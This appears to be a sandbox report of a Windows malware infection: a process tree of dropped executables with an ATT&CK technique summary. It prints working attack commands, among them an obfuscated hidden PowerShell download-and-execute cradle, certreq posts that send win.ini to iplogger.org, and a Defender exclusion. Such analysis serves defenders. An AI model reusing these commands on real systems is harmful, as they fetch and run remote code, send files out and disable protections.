C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵PID:4072
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵PID:4700
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\khzttn4jw50\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\khzttn4jw50\chashepro3.exe" /VERYSILENT10⤵PID:5692
-
C:\Users\Admin\AppData\Local\Temp\is-Q1BOH.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q1BOH.tmp\chashepro3.tmp" /SL5="$103F8,2015144,58368,C:\Users\Admin\AppData\Local\Temp\khzttn4jw50\chashepro3.exe" /VERYSILENT11⤵PID:5328
-
C:\Program Files (x86)\JCleaner\8.exe"C:\Program Files (x86)\JCleaner\8.exe"12⤵PID:5932
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo grYNxrw13⤵PID:6600
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys13⤵PID:6688
-
C:\Windows\SysWOW64\cmd.execmd14⤵PID:1160
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"12⤵PID:2280
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"12⤵PID:3492
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\212⤵PID:2544
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\213⤵PID:6880
-
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"12⤵PID:5244
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"13⤵PID:7044
-
-
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"12⤵PID:188
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"12⤵PID:5476
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"12⤵PID:2864
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\212⤵PID:5224
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\213⤵PID:6852
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pbsv5dwhf0m\oedlylfeu4t.exe"C:\Users\Admin\AppData\Local\Temp\pbsv5dwhf0m\oedlylfeu4t.exe" /ustwo INSTALL10⤵PID:6084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 65611⤵
- Program crash
PID:5368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 67211⤵
- Program crash
PID:6332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 62811⤵
- Program crash
PID:6712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 72011⤵
- Program crash
PID:6840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 88411⤵
- Program crash
PID:6512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 93211⤵
- Program crash
PID:6364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 108811⤵
- Program crash
PID:6096
-
-
-
C:\Users\Admin\AppData\Local\Temp\phly3v05rre\l3w5amgzgkt.exe"C:\Users\Admin\AppData\Local\Temp\phly3v05rre\l3w5amgzgkt.exe" 57a764d042bf810⤵PID:4288
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\H4LFHWEFEH\H4LFHWEFE.exe" 57a764d042bf8 & exit11⤵PID:6376
-
C:\Program Files\H4LFHWEFEH\H4LFHWEFE.exe"C:\Program Files\H4LFHWEFEH\H4LFHWEFE.exe" 57a764d042bf812⤵PID:6644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\010ltjk1x4b\vpn.exe"C:\Users\Admin\AppData\Local\Temp\010ltjk1x4b\vpn.exe" /silent /subid=48210⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\is-49EUJ.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-49EUJ.tmp\vpn.tmp" /SL5="$104C0,15170975,270336,C:\Users\Admin\AppData\Local\Temp\010ltjk1x4b\vpn.exe" /silent /subid=48211⤵PID:5220
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "12⤵PID:7024
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090113⤵PID:4452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "12⤵PID:4552
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090113⤵PID:5284
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\25jofn25l5h\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\25jofn25l5h\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq10⤵PID:5792
-
C:\Users\Admin\AppData\Local\Temp\is-CS4CP.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-CS4CP.tmp\IBInstaller_97039.tmp" /SL5="$203C8,14452723,721408,C:\Users\Admin\AppData\Local\Temp\25jofn25l5h\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq11⤵PID:5396
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703912⤵PID:6664
-
-
C:\Users\Admin\AppData\Local\Temp\is-7C0J7.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-7C0J7.tmp\{app}\chrome_proxy.exe"12⤵PID:6692
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7C0J7.tmp\{app}\chrome_proxy.exe"13⤵PID:5664
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 414⤵
- Runs ping.exe
PID:4488
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wxmat3ybjbk\app.exe"C:\Users\Admin\AppData\Local\Temp\wxmat3ybjbk\app.exe" /8-2310⤵PID:5512
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Wind"11⤵PID:6224
-
-
C:\Program Files (x86)\Lingering-Wind\7za.exe"C:\Program Files (x86)\Lingering-Wind\7za.exe" e -p154.61.71.51 winamp-plugins.7z11⤵PID:372
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lingering-Wind\app.exe" -map "C:\Program Files (x86)\Lingering-Wind\WinmonProcessMonitor.sys""11⤵PID:6640
-
C:\Program Files (x86)\Lingering-Wind\app.exe"C:\Program Files (x86)\Lingering-Wind\app.exe" -map "C:\Program Files (x86)\Lingering-Wind\WinmonProcessMonitor.sys"12⤵PID:6132
-
-
-
C:\Program Files (x86)\Lingering-Wind\7za.exe"C:\Program Files (x86)\Lingering-Wind\7za.exe" e -p154.61.71.51 winamp.7z11⤵PID:6256
-
-
C:\Program Files (x86)\Lingering-Wind\app.exe"C:\Program Files (x86)\Lingering-Wind\app.exe" /8-2311⤵PID:6528
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2FDB.exeC:\Users\Admin\AppData\Local\Temp\2FDB.exe1⤵PID:4932
-
C:\Users\Admin\AppData\Local\Temp\34FC.exeC:\Users\Admin\AppData\Local\Temp\34FC.exe1⤵PID:4324
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:4588
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:5008
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:5440
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6848
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:7156
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4444
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1132
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:7376
-
C:\Users\Admin\AppData\Local\Temp\E03C.exeC:\Users\Admin\AppData\Local\Temp\E03C.exe1⤵PID:7700
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3271.bat" "2⤵PID:9184
-
-
C:\Users\Admin\AppData\Local\Temp\2E7C.tmp.exeC:\Users\Admin\AppData\Local\Temp\2E7C.tmp.exe1⤵PID:6592
-
C:\Users\Admin\AppData\Local\Temp\3A55.tmp.exeC:\Users\Admin\AppData\Local\Temp\3A55.tmp.exe1⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\3D72.exeC:\Users\Admin\AppData\Local\Temp\3D72.exe1⤵PID:8072
-
C:\Users\Admin\AppData\Local\Temp\4D62.tmp.exeC:\Users\Admin\AppData\Local\Temp\4D62.tmp.exe1⤵PID:7284
-
C:\Users\Admin\AppData\Local\Temp\55FE.tmp.exeC:\Users\Admin\AppData\Local\Temp\55FE.tmp.exe1⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\8200.tmp.exeC:\Users\Admin\AppData\Local\Temp\8200.tmp.exe1⤵PID:7548
-
C:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exeC:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exe1⤵PID:4808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵PID:5348
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:1172
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 18922⤵
- Program crash
PID:304
-
-
C:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exe"C:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exe"2⤵PID:8340
-
-
C:\Users\Admin\AppData\Local\Temp\D61E.tmp.exeC:\Users\Admin\AppData\Local\Temp\D61E.tmp.exe1⤵PID:1084
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6032
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8000
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6324
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6760
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4644
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6864
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1944
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7012
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:620
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7188
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6428
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:8476
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{10308d81-b0d8-4b48-b0b2-617a4af7e36b}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8708
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"2⤵PID:7516
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\391feca84d754ed79cc087bb679a313b /t 564 /p 71881⤵PID:8656
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:2100
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5136
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
4Web Service
1